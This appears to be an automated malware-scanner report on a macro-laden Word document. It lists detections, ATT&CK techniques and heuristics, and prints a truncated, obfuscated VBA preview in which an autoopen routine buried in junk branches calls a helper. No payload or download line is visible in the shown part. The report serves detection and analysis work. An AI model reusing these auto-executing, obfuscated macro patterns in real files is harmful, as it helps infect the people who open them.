MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and contains a high-severity OLE_VBA_AUTOOPEN heuristic, indicating the presence of an auto-executing VBA macro. The macro is designed to execute code using GetObject, likely to download and run a second-stage payload. No specific family could be identified, but the technique suggests a macro-based downloader.
Heuristics 7
-
ClamAV: Doc.Malware.Dvwf-6956245-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Dvwf-6956245-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25546 bytes |
SHA-256: 63552ef952b653ad980325adb7767d567b0b555ec0f33d991ecea5e213c95f33 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OAAAZC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wQDCAcC"
Attribute VB_Base = "0{EC36BAE5-7ADE-4F95-B004-CE1957793634}{5B1E76E0-9352-4FC3-AED8-71E38191B46E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "I4XAUBBZ"
Attribute VB_Base = "0{C824A8E8-B0A3-406D-9B48-F91A9EA68976}{0778C759-CC9F-4601-AD3A-CD781E9CA4CB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "dBACAAA1"
Sub autoopen()
If v_AQQCBc = kZABkQA Then
ElseIf u_UAUCA = mxBDXA Then
s4ACxUA = Atn(454565679)
ElseIf YCkkooQ = LUxBQ41 Then
uA1UA_GQ = Int(999281804)
ElseIf oA4Q1QAX = j1GQAA Then
End If
If LQX4BAA = iAABBABQ Then
ElseIf m_4AUBAA = hUAAZB Then
b_QUAX = Atn(430765672)
ElseIf jwDAAD = t4xAxAQo Then
KcUDcU = Int(727024415)
ElseIf MxGA1D_A = qXxDc4 Then
End If
If UQcoCA = ZXAUGD Then
ElseIf KAZUBAB = ZAUUAk Then
ZA1AQB_ = Atn(632069907)
ElseIf IACDXDA = FZGDAAQA Then
jAA_AXx = Int(911954614)
ElseIf QxDAoG4A = AAAw_c Then
End If
c4DDUC
If wABAQQ = iDQkAw Then
ElseIf VQD1UU_ = tZUXBDBA Then
nAXkDD1A = Atn(39628240)
ElseIf hAAAcxXZ = j_QAAB Then
mCBA1G = Int(53483851)
ElseIf zCA1AXA = XC4AAA Then
End If
If lABXZQ = AAAABA Then
ElseIf MUBkQD = YGQBDBG Then
LoAAAUkA = Atn(70914249)
ElseIf ADACAA = sAD4UXA Then
bAAwAc = Int(631660017)
ElseIf ToG_QU = SDQBQAcA Then
End If
End Sub
Function XXxX4Dw(mQoADc)
If MAA4A4G = zDCcQA Then
ElseIf VoA1ABB = MDQBAA Then
aACDxXG = Atn(903441126)
ElseIf rA11AAoB = PcDUAXD Then
TBB4_AA = Int(374880229)
ElseIf lDUDAxx = j4c1ZQwQ Then
End If
If UUAAU_ = f1QUAo Then
ElseIf t4oAcZ = twGAAADB Then
IZw4oAUA = Atn(324071606)
ElseIf SAc11AA = BAAAQXAA Then
LGcAUAAA = Int(711569659)
ElseIf rXoAQcU4 = CUABA4A Then
End If
Set XXxX4Dw = CVar(mQoADc)
If YAQG_w = wAADcA Then
ElseIf pXQAo_G = uAGA4AAZ Then
pAAAACo = Atn(806537656)
ElseIf U1UA_B = BXxGDG Then
rwDAXBBQ = Int(875458927)
ElseIf H1DcAD = ixQ4QBU Then
End If
If pkBoxZGA = QAA4D1kQ Then
ElseIf VBXAAcoU = ickQDAA Then
HXX1Dk = Atn(396828347)
ElseIf CAowAAU = WkxA1UAA Then
jQXAQQ = Int(397614101)
ElseIf cBADDD = mDX1AkAU Then
End If
End Function
Attribute VB_Name = "v_oDAA1"
Function c4DDUC()
On Error Resume Next
If TADxxoB = wGU1Qo Then
ElseIf XUZBA1A = AQA1Q1Z Then
WAcQQ_Bc = Atn(902672992)
ElseIf uA4_c4 = BAAA_ABx Then
WUoc4_GA = Int(685590749)
ElseIf lDUQ1_ = k1AAG1BU Then
End If
If cDAUAABA = IAcUAZG Then
ElseIf TA4ADQ = zCQQADw Then
dxAXkoDZ = Atn(512946224)
ElseIf OZAoAA = wQDXQBAX Then
SwAXAAGC = Int(918804106)
ElseIf NABGA1_A = EA111wB Then
End If
If 5072 < 19851 Then
tA_QAB4w = vbFalse
If qGAAwowB = iCGAQBZ Then
ElseIf b1XAwU = n_GAAAc Then
NooAGwcC = Atn(996313995)
ElseIf UBxUAwB = MUXBA_D Then
oAUUx1A = Int(645588906)
ElseIf EX_wGQAX = fBAQQZBG Then
End If
If jUAAGUoc = v44GACQ Then
ElseIf J1GDXACQ = LAAwAAA Then
Y4AA_AA = Atn(887414397)
ElseIf UCCAQA = fQcAAk Then
iDDXAcBo = Int(141127305)
ElseIf AXXAXGD = OZxZQwQB Then
End If
If wAAADDQ = Aw4wQDA Then
ElseIf PAAZADU = tBGDwB4 Then
nAAUDAA = Atn(51129147)
ElseIf FCxAw4A = YxABDUAA Then
BQABBZUA = Int(578241693)
ElseIf txAA4ABA = IwA_QcU
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.